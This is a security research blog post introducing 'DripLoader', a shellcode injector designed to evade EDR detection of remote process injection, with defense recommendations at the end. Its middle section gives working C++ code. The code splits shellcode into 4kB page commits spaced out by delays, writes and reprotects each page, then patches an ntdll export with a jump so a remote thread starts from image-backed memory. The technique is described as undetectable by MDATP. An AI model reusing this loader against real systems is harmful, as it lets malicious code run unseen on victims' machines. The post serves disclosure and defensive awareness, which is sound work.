Bypassing EDR Real-Time Injection Detection Logic
By Filip Olszak
This post is not about suppressing event collection, but about discovering EDR architecture limitations in the context of process injection.
Some great posts on bypassing EDR agent collection:
Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR (outflank)
A tale of EDR bypass methods (@s3cur3th1ssh1t)
FireWalker: A New Approach to Generically Bypass User-Space EDR Hooking (mdsec)
Hell's Gate (@smelly__vx, @am0nsec)
Halo's Gate - twin sister of Hell's Gate (sektor7)
Another method of bypassing ETW and Process Injection via ETW registration (@modexpblog)
Data Only Attack: Neutralizing EtwTi Provider (@slaeryan, kernel mode)
Introduction
In the previous post we discussed how solutions that use reliable, kernel-based sources for remote memory allocation events can use these to identify many of the in-the-wild injections with relative ease, regardless of the specific technique used, and without worrying that the event source is trivial to bypass from user mode. Most notably, Microsoft does this through ETW, though there are vendors who do it better.
Today I want to share how easy it is to bypass any memory allocation-based logic. We will also bypass thread initialization alerting. Combined, the two give us a technique undetectable by MDATP and many other EDRs out there, as of today.
It is important to expose detection gaps like this, not only to force security vendors to improve defenses, but primarily to build awareness around inherent limitations of these solutions and the need for in-house security R&D programs, or at least use of well-engineered managed detection services for more complete coverage.
T1055 vs EDR
Let's first take a look at what independent evaluations can tell us about process injections, and whether there is even anything to bypass.

It's definitely good to know the product you're using is not able to flag Meterpreter's migrate command and process hollowing procedures from a 5+-year-old Carbanak malware available on GitHub, even with prior knowledge of what is going to be tested, and half a year to prepare if needed.
Other than that, the value of the last evaluation in the context of injections is very limited. We do not get the full picture of how much each vendor invests in researching TTPs relevant right now and in the future, or of how robust the detection capability and data sources really are.

While some EDRs were not able to flag on the elementary techniques, many improved detection capabilities to the point that today, it is not uncommon for process injection to be considered OPSEC-expensive by red teams. Experienced operators tend to tailor detection bypasses per-solution, and in some environments, they choose to avoid injecting altogether, as the very limited set of APIs Windows exposes for memory and thread management are under close surveillance.
We are going to talk about bypassing the mature solutions today - for the ones with T1055 misses here just use APC injection and you'll probably be fine.
Let's first discuss all the detection opportunities for anomalous remote thread creation.
CRT anomalies
The API getting the most attention has to be kernel32!CreateRemoteThread, but we are really talking about ntdll!NtCreateThreadEx, or the kernel-mode target intercepted through kernel callbacks.

Here we have a basic detection for a specific Windows process, msbuild.exe, creating a new thread in a remote process. Even though the criticality of a potential true positive would be quite high, after testing the rule author decided it is only suitable for low severity (probably due to FP-rate), which likely degrades the rule to an IR label/enrichment in most environments.
Such a simple detection rule is unlikely to be part of a mature EDR solution where customers expect to receive alerts for activities like this with high severity while keeping noise down to allow their analysts to review and classify the important stuff.

A more generic, custom MDATP thread creation rule, based around the new FileProfile() enrichment function, detects extremely rare files creating threads in remote processes. Very useful to implement in-house, but still unlikely to be found in EDRs in such a simple form, as it would cause substantial amounts of false positives in certain environments, and could prove difficult to maintain.
As an example, Defender logs most remote thread creations as labeled events, but low file prevalence is not a good enough indicator to trigger an alert on its own, and there is more advanced logic in play. This is true for most decent EDRs.

Understanding correlation
By "detections" and "alerts" I do not just mean labeled activity that can be found somewhere in the platform, but rather independent pieces of logic able to signal threats with high enough fidelity to generate user-facing security incidents with no additional activity tagged on the endpoint.
(I also assume the platform is not incredibly noisy, to the level of it being unusable)
This is important to remember as EDRs use various kinds of correlation to link otherwise undetected activities to existing incidents initiated by high fidelity alerts, or generate them based on some risk score analysis often affectionately called "AI", making it difficult to judge whether some particular TTP would be detected in isolation. Some types of correlation can be very complex and difficult for adversaries to guess, but due to the high costs associated with preserving active context and using it in detection, time-based correlation plays a role in most.
On-agent detections, activity, and software inventories are often not implemented or limited in scope due to reverse engineering concerns or architecting difficulties.
We will exploit this fact later on when building our shellcode injector by introducing delays in execution as one way to avoid detection. The concept is not new and is commonly used in network attacks where IDS solutions tend to detect based on thresholds.
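To make the idea of time-based correlation concrete, here is a minimal sketch. The Event record, its field names, and the fixed window are all assumptions made for illustration; real EDR correlation is vendor-specific and far more involved. The function counts how many events for one source/target pair still sit inside the window, measured back from the newest matching event.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Hypothetical event record; field names are illustrative only.
struct Event {
    std::uint64_t timestampMs; // when the event was observed
    std::uint32_t sourcePid;   // process performing the action
    std::uint32_t targetPid;   // process being acted upon
};

// Counts events for the given source/target pair that fall within
// `windowMs` of the newest matching event. In this simplified model,
// older events have already dropped out of the active context.
std::size_t correlatedCount(const std::vector<Event>& events,
                            std::uint32_t sourcePid,
                            std::uint32_t targetPid,
                            std::uint64_t windowMs)
{
    bool found = false;
    std::uint64_t newest = 0;
    for (const Event& e : events) {
        if (e.sourcePid == sourcePid && e.targetPid == targetPid) {
            if (!found || e.timestampMs > newest)
                newest = e.timestampMs;
            found = true;
        }
    }
    if (!found)
        return 0;

    std::size_t count = 0;
    for (const Event& e : events) {
        if (e.sourcePid == sourcePid && e.targetPid == targetPid &&
            newest - e.timestampMs <= windowMs)
            ++count;
    }
    return count;
}
```

With a one-second window, three events 100 ms apart are counted together, while three events a minute apart are each seen in isolation.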
High fidelity alerts
So we know that even though the number of functions to monitor is limited, the volume of legitimate events poses significant challenges for high fidelity detection, and forces defenders to narrow down what constitutes "suspicious", resulting in heavy filtering or log&ignore of many collected events.
For thread creation, the most common constraint is thread-starting process ≠ hosting process, so only remote thread creation is monitored, usually also limited to those with:
thread start in an image-"unbacked", MEM_COMMIT-type segment
the size of the segment being larger than X
At scale this will still generate a very significant amount of false positives, which may lead to further filtering, for example:
thread location (target) only in Windows built-in executables
    only a subset of these
thread initiator (source) only in risky executables
    unknown hashes
    low file prevalence
    risky paths (%userprofile%, %temp% etc.)
    not seen on the network/on the host
memory page contains suspicious stuff
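The filters above can be pictured as a single predicate over a thread-start event. This is only a sketch: the ThreadStartEvent and FilterConfig types, their field names, and the thresholds are hypothetical and do not describe any particular vendor's logic.

```cpp
#include <cstdint>

// Hypothetical thread-start event; fields are illustrative only.
struct ThreadStartEvent {
    std::uint32_t sourcePid;            // process that started the thread
    std::uint32_t targetPid;            // process hosting the thread
    bool          startInImageBacked;   // start address lies in image-backed memory
    std::uint64_t segmentSize;          // size of the segment holding the start address
    std::uint32_t sourceFilePrevalence; // how many hosts have seen the source file
};

// Hypothetical tuning knobs for the filter.
struct FilterConfig {
    std::uint64_t minSegmentSize; // the "X" threshold from the list above
    std::uint32_t maxPrevalence;  // at or below this the source counts as "rare"
};

// Returns true only when every narrowing condition holds.
bool isAlertCandidate(const ThreadStartEvent& e, const FilterConfig& cfg)
{
    if (e.sourcePid == e.targetPid)
        return false; // local thread creation is ignored
    if (e.startInImageBacked)
        return false; // only "unbacked" start addresses are of interest
    if (e.segmentSize <= cfg.minSegmentSize)
        return false; // segment must be larger than X
    return e.sourceFilePrevalence <= cfg.maxPrevalence;
}
```

Every condition exists to cut legitimate volume, and every condition also defines a class of events that will never reach an analyst.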
Machine learning models are often employed to attempt to solve this issue. These assumptions will differ between vendors, but the idea is always to tame the volume of thread creation events. The less mature solutions in fact often rely on thread creation hooking/callbacks as the only source of data for injection detection.
DripLoader
DripLoader is an evasive shellcode loader (injector) for bypassing event-based injection detection, without necessarily suppressing event collection.
The project aims to highlight the limitations of event-driven injection identification, and to show the need for more advanced memory scanning and smarter local agent inventories in EDR.
DripLoader evades EDRs by:
using the most risky APIs possible, like NtAllocateVirtualMemory and NtCreateThreadEx
blending in with call arguments to create events that vendors are forced to drop or log&ignore due to volume
avoiding multi-event correlation by introducing delays
Allocating memory
To bypass any memory allocation-based logic we will only commit at page granularity, that is PageSize-sized pages, which on Windows 10 with a modern processor is 4kB:
this constant, found in the SYSTEM_INFO structure, tells us the lowest possible size of a VM allocation
since most legitimate remote VM operations work on a single byte or a few bytes, 4kB is by far the most prevalent allocation size (>95%), making it extremely challenging to detect on
To accomplish this we need to deal with some inconveniences:
we need our shellcode in memory as a contiguous byte sequence, which means we cannot let kernel32!VirtualAllocEx choose the base, as it might reserve memory at an address where the other allocations will not fit
in Windows, any new VM allocation made with kernel32!VirtualAllocEx and similar is rounded up to AllocationGranularity, which is another constant found in SYSTEM_INFO and is usually 64kB
    for example, if we allocate 4kB of MEM_COMMIT | MEM_RESERVE memory at 0x40000000, the whole 64kB region up to 0x40010000 will be unavailable for new allocations
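The rounding in the example above is plain alignment arithmetic. The sketch below hard-codes the 4kB page size and 64kB allocation granularity as assumptions (on a real system both come from SYSTEM_INFO), and the helper names are made up for illustration.

```cpp
#include <cstdint>

// Assumed values; on a live system read them from SYSTEM_INFO instead.
constexpr std::uint64_t kPageSize         = 0x1000;  // 4kB
constexpr std::uint64_t kAllocGranularity = 0x10000; // 64kB

// Rounds `value` up to the next multiple of `alignment`.
constexpr std::uint64_t alignUp(std::uint64_t value, std::uint64_t alignment)
{
    return (value + alignment - 1) / alignment * alignment;
}

// Rounds `value` down to the previous multiple of `alignment`.
constexpr std::uint64_t alignDown(std::uint64_t value, std::uint64_t alignment)
{
    return value / alignment * alignment;
}

// Exclusive end of the address range that a fresh allocation of `size`
// bytes at `base` makes unavailable to other new allocations.
constexpr std::uint64_t reservedEnd(std::uint64_t base, std::uint64_t size)
{
    return alignUp(base + size, kAllocGranularity);
}

// Number of page-sized commits that fit in one granularity-sized region.
constexpr std::uint64_t kPagesPerRegion = kAllocGranularity / kPageSize;

static_assert(reservedEnd(0x40000000, kPageSize) == 0x40010000,
              "a 4kB allocation occupies a full 64kB slot");
static_assert(kPagesPerRegion == 16, "sixteen 4kB pages per 64kB region");
```

So a single 4kB allocation at 0x40000000 blocks the range up to 0x40010000, and one such region can hold sixteen separate 4kB commits.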
Steps we take
pre-define a list of 64-bit base addresses and VirtualQueryEx the target process to find the first region able to fit our shellcode blob
const std::vector<LPVOID> VC_PREF_BASES{ (void*)0x00000000DDDD0000,
(void*)0x0000000010000000,
(void*)0x0000000021000000,
(void*)0x0000000032000000,
(void*)0x0000000043000000,
(void*)0x0000000050000000,
(void*)0x0000000041000000,
(void*)0x0000000042000000,
(void*)0x0000000040000000,
(void*)0x0000000022000000 };
LPVOID GetSuitableBaseAddress(HANDLE hProc, DWORD szPage, DWORD szAllocGran, DWORD cVmResv)
{
MEMORY_BASIC_INFORMATION mbi;
for (auto base : VC_PREF_BASES) {
VirtualQueryEx(
hProc,
base,
&mbi,
sizeof(MEMORY_BASIC_INFORMATION)
);
if (MEM_FREE == mbi.State) {
uint64_t i;
for (i = 0; i < cVmResv; ++i) {
LPVOID currentBase = (void*)((DWORD_PTR)base + (i * szAllocGran));
VirtualQueryEx(
hProc,
currentBase,
&mbi,
sizeof(MEMORY_BASIC_INFORMATION)
);
if (MEM_FREE != mbi.State)
break;
}
if (i == cVmResv) {
// found suitable base
return base;
}
}
}
return nullptr;
}
reserve the required number of full AllocationGranularity (64kB) sized regions, and then loop over those committing 4kB pages to ensure page alignment
// MEM_RESERVE, NO_ACCESS, 64kB
for (i = 1; i <= cVmResv; ++i)
{
// sleeps here
ANtAVM(
hProc,
&currentVmBase,
NULL,
&szVmResv,
MEM_RESERVE,
PAGE_NOACCESS
);
if (STATUS_SUCCESS == status)
vcVmResv.push_back(currentVmBase);
else
return 4;
currentVmBase = (LPVOID)((DWORD_PTR)currentVmBase + szVmResv);
}
// MEM_COMMIT, PAGE_READWRITE -> PAGE_EXECUTE_READ, 4kB
for (i = 0; i < cVmResv; ++i)
{
for (cmm_i = 0; cmm_i < cVmCmm; ++cmm_i)
{
DWORD offset = (cmm_i * szVmCmm);
currentVmBase = (LPVOID)((DWORD_PTR)vcVmResv[i] + offset);
ANtAVM(
hProc,
&currentVmBase,
NULL,
&szVmCmm,
MEM_COMMIT,
PAGE_READWRITE
);
// sleeps here
SIZE_T szWritten{ 0 };
ANtWVM(
hProc,
currentVmBase,
&shellcode[offsetSc],
szVmCmm,
&szWritten
);
offsetSc += szVmCmm;
// sleeps here
ANtPVM(
hProc,
&currentVmBase,
&szVmCmm,
PAGE_EXECUTE_READ,
&oldProt
);
}
}
The pages are also written to and individually reprotected with each run to avoid a large RegionSize of a target memory page in properties of logged VirtualProtectEx events (EtwTi provides this, and hooks can too).
Creating the thread
Now that we have our shellcode in the remote process we need to initiate its execution.
To do this we will use the NtCreateThreadEx native API, which is the ntdll target of CRT, and hence very commonly called by legitimate software. To bypass any detections we will:
create the new thread from a MEM_IMAGE base address
    moreover, we use a known-good module loaded by the Windows Loader, ntdll.dll
the location will be patched with a far jmp to our shellcode base at the time of thread creation
Steps we take
figure out the RVA of the function we will hijack
// ntdll.dll
char jmpModName[]{ 'n','t','d','l','l','.','d','l','l','\0' };
// RtlpWow64CtxFromAmd64
char jmpFuncName[]{ 'R','t','l','p','W','o','w','6','4','C','t','x','F','r','o','m','A','m','d','6','4','\0' };
LPVOID PrepEntry(HANDLE hProc, LPVOID vm_base)
{
unsigned char* b = (unsigned char*)&vm_base;
unsigned char jmpSc[7]{
0xB8, b[0], b[1], b[2], b[3],
0xFF, 0xE0
};
// find the export EP offset
HMODULE hJmpMod = LoadLibraryExA(
jmpModName,
NULL,
DONT_RESOLVE_DLL_REFERENCES
);
if (!hJmpMod)
return nullptr;
LPVOID lpDllExport = GetProcAddress(hJmpMod, jmpFuncName);
DWORD offsetJmpFunc = (DWORD)lpDllExport - (DWORD)hJmpMod;
[...]
}
find the base of the remote ntdll and calculate AVA
[...]
LPVOID lpRemFuncEP{ 0 };
HMODULE hMods[1024];
DWORD cbNeeded;
char szModName[MAX_PATH];
if (EnumProcessModules(hProc, hMods, sizeof(hMods), &cbNeeded))
{
int i;
for (i = 0; i < (cbNeeded / sizeof(HMODULE)); i++)
{
if (GetModuleFileNameExA(hProc, hMods[i], szModName, sizeof(szModName) / sizeof(char)))
{
if (strcmp(PathFindFileNameA(szModName), jmpModName)==0) {
lpRemFuncEP = hMods[i];
break;
}
}
}
}
lpRemFuncEP = (LPVOID)((DWORD_PTR)lpRemFuncEP + offsetJmpFunc);
[...]
overwrite the function prologue with a jmp
[...]
if (NULL == lpRemFuncEP)
return nullptr;
SIZE_T szWritten{ 0 };
WriteProcessMemory(
hProc,
lpDllExport,
jmpSc,
sizeof(jmpSc),
&szWritten
);
return lpDllExport;
}
CreateRemoteThread
The full source and more explanations can be found on GitHub
Result
1. The activity will generate events with the following characteristics
// reservations
VM_ALLOC:
REMOTE: 1,
SIZE: 0x10000,
TYPE: 0x2000,
PROT: 0x01 (-)
// commits
VM_ALLOC:
REMOTE: 1,
SIZE: 0x1000,
TYPE: 0x1000,
PROT: 0x04 (rw)
VM_WRITE:
REMOTE: 1,
SIZE: 0x1000
THREAD_START:
REMOTE: 1,
SUSPENDED: 0,
ACCMSK: 0xFFFF (full),
PAGE_TYPE: 0x1000000 (img),
LPTHREAD_START_ROUTINE: ntdll.RtlpWow64CtxFromAmd64+0x0
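For anyone reading these events in raw form, the numeric fields map onto well-known Windows memory constants. The helpers below are a small decoding sketch; the function names are made up for illustration, and the constants are redefined locally so the snippet builds without the Windows SDK.

```cpp
#include <cstdint>
#include <string>

// Decodes the allocation TYPE field (flAllocationType values).
std::string allocTypeName(std::uint32_t type)
{
    switch (type) {
    case 0x1000: return "MEM_COMMIT";
    case 0x2000: return "MEM_RESERVE";
    case 0x3000: return "MEM_COMMIT | MEM_RESERVE";
    default:     return "unknown";
    }
}

// Decodes the PROT field (page protection constants).
std::string protectionName(std::uint32_t prot)
{
    switch (prot) {
    case 0x01: return "PAGE_NOACCESS";
    case 0x02: return "PAGE_READONLY";
    case 0x04: return "PAGE_READWRITE";
    case 0x10: return "PAGE_EXECUTE";
    case 0x20: return "PAGE_EXECUTE_READ";
    case 0x40: return "PAGE_EXECUTE_READWRITE";
    default:   return "unknown";
    }
}

// Decodes the PAGE_TYPE field (MEMORY_BASIC_INFORMATION.Type values).
std::string pageTypeName(std::uint32_t type)
{
    switch (type) {
    case 0x20000:   return "MEM_PRIVATE";
    case 0x40000:   return "MEM_MAPPED";
    case 0x1000000: return "MEM_IMAGE";
    default:        return "unknown";
    }
}
```

Read this way, the reservations are MEM_RESERVE with PAGE_NOACCESS, the commits are MEM_COMMIT with PAGE_READWRITE, and the thread start address sits in MEM_IMAGE memory.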
2. State of the target process (assuming shellcode does not create thread)


Defense recommendations
Option #1: Monitor injection APIs yourself
EDRs with custom rule creation (or hunting) capabilities can be used, but make sure to fully understand under what circumstances events are collected
aggregations and least frequency analysis hunting queries can be used to reduce workloads for your team
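As a rough illustration of least frequency analysis, the sketch below aggregates remote thread creation events by source/target image pair and ranks the rarest pairs first. The RemoteThreadEvent record and its fields are hypothetical; in practice this would be a hunting query in your EDR or SIEM rather than C++.

```cpp
#include <algorithm>
#include <cstddef>
#include <map>
#include <string>
#include <utility>
#include <vector>

// Hypothetical exported event; field names are illustrative only.
struct RemoteThreadEvent {
    std::string sourceImage; // image that created the thread
    std::string targetImage; // image hosting the new thread
};

using ImagePair = std::pair<std::string, std::string>;
using PairCount = std::pair<ImagePair, std::size_t>;

// Counts events per (source, target) pair and returns the pairs sorted
// by ascending count, so the least frequent combinations come first.
std::vector<PairCount> leastFrequentPairs(const std::vector<RemoteThreadEvent>& events)
{
    std::map<ImagePair, std::size_t> counts;
    for (const RemoteThreadEvent& e : events)
        ++counts[ImagePair(e.sourceImage, e.targetImage)];

    std::vector<PairCount> ranked(counts.begin(), counts.end());
    std::stable_sort(ranked.begin(), ranked.end(),
                     [](const PairCount& a, const PairCount& b) {
                         return a.second < b.second;
                     });
    return ranked;
}
```

Reviewing only the top of this list is one way to keep the workload manageable while still looking at pairs that never occur in normal operation.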